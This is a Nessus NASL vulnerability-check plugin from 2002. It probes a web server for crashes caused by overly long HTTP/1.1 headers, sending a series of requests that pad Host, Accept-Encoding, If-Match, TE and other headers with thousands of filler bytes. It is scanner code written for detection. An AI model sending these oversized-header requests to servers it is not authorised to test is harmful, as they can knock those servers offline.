#
# This script was written by Michel Arboi <arboi@bigfoot.com>
# GPL
# *untested*
#
# I don't even know if it crashes any web server...
# 
# Cf. RFC 2068


if(description)
{
 script_id(11129);
 script_version ("$Revision: 1.3.2.1 $");
 name["english"] = "HTTP 1.1 header overflow";
 script_name(english:name["english"]);
 
 desc["english"] = "It was possible to kill the web server by
sending an invalid request with a too long HTTP 1.1 header
(Accept-Encoding, Accept-Language, Accept-Range, Connection, 
Expect, If-Match, If-None-Match, If-Range, If-Unmodified-Since,
Max-Forwards, TE, Host)

A cracker may exploit this vulnerability to make your web server
crash continually or even execute arbirtray code on your system.

Solution : upgrade your software or protect it with a filtering reverse proxy
Risk factor : High";

 script_description(english:desc["english"]);
 
 summary["english"] = "Too long HTTP 1.1 header kills the web server";
 script_summary(english:summary["english"]);
 
 script_category(ACT_MIXED_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
 family["english"] = "Gain root remotely";
 family["francais"] = "Passer root  distance";
 script_family(english:family["english"], francais:family["francais"]);
 script_require_ports("Services/www", 80);
 script_dependencie("find_service.nes", "httpver.nasl", "http_version.nasl");
 exit(0);
}

########

include("http_func.inc");

if (safe_checks()) exit(0);

port = get_kb_item("Services/www");
if(!port) port = 80;
if(! get_port_state(port)) exit(0);
if (http_is_dead(port: port)) exit(0);

soc = http_open_socket(port);
if(! soc) exit(0);

# TBD: remplacer recv par http_recv et close par http_close...

r = string("GET / HTTP/1.1\r\nHost: ", crap(1024), "\r\n\r\n");

send(socket:soc, data: r);
r = http_recv(socket: soc);
http_close_socket(soc);

#
soc = http_open_socket(port);
if (! soc)  { display ("Host\n"); security_hole(port); exit(0); }
#
#
r1 = string("GET / HTTP/1.1\r\nHost: ", get_host_name(), "\r\n");
#
r = string(r1, "Accept-Encoding: ", crap(4096), "compress, *\r\n\r\n");

send(socket:soc, data: r);
r = http_recv(socket: soc);
http_close_socket(soc);

#
soc = http_open_socket(port);
if (! soc)  { display ("Accept-Encoding\n"); security_hole(port); exit(0); }

r = string(r1, "Accept-Language: en, ", crap(4096), "\r\n\r\n");

send(socket:soc, data: r);
r = http_recv(socket: soc);
http_close_socket(soc);

#
soc = http_open_socket(port);
if (! soc)  { display ("Accept-Language\n"); security_hole(port); exit(0); }

r = string(r1, "Accept-Range: ",crap(data: "bytes", length: 4096), "\r\n\r\n");

send(socket:soc, data: r);
r = http_recv(socket: soc);
http_close_socket(soc);

#
soc = http_open_socket(port);
if (! soc)  { display ("Accept-Range\n"); security_hole(port); exit(0); }

r = string(r1, "Connection: ", crap(data: "close", length: 4096), "\r\n\r\n");

send(socket:soc, data: r);
r = http_recv(socket: soc);
http_close_socket(soc);

#
soc = http_open_socket(port);
if (! soc)  { display ("Connection\n"); security_hole(port); exit(0); }

r = string(r1, "Expect: ", crap(4096), "=",crap(4096), "\r\n\r\n");

send(socket:soc, data: r);
r = http_recv(socket: soc);
http_close_socket(soc);

#
soc = http_open_socket(port);
if (! soc)  { display ("Expect\n"); security_hole(port); exit(0); }

r = string(r1, "If-Match: ", crap(4096), "\r\n\r\n");

send(socket:soc, data: r);
r = http_recv(socket: soc);
http_close_socket(soc);

#
soc = http_open_socket(port);
if (! soc)  { display ("If-Match\n"); security_hole(port); exit(0); }

r = string(r1, "If-None-Match: ", crap(4096), "\r\n\r\n");

send(socket:soc, data: r);
r = http_recv(socket: soc);
http_close_socket(soc);

#
soc = http_open_socket(port);
if (! soc)  { display ("If-None-Match\n"); security_hole(port); exit(0); }

r = string(r1, "If-Range: ", crap(4096), "\r\n\r\n");

send(socket:soc, data: r);
r = http_recv(socket: soc);
http_close_socket(soc);

#
soc = http_open_socket(port);
if (! soc)  { display ("If-Range\n"); security_hole(port); exit(0); }

r = string(r1, "If-Unmodified-Since: Sat, 29 Oct 1994 19:43:31 ", 
	crap(data: "GMT", length: 1024), "\r\n\r\n");

send(socket:soc, data: r);
r = http_recv(socket: soc);
http_close_socket(soc);

#
soc = http_open_socket(port);
if (! soc)  { display ("If-Unmodified-Since\n"); security_hole(port); exit(0); }

r = string(r1, "Max-Forwards: ", crap(data: "6", length: 4096), "\r\n\r\n");

send(socket:soc, data: r);
r = http_recv(socket: soc);
http_close_socket(soc);

#
soc = http_open_socket(port);
if (! soc)  { display ("Max-Forwards\n"); security_hole(port); exit(0); }

r = string(r1, "TE: deflate, ", crap(4096), "\r\n\r\n");

send(socket:soc, data: r);
r = http_recv(socket: soc);
http_close_socket(soc);

#
if (http_is_dead(port: port)) { display ("RE\n"); security_hole(port); exit(0); }
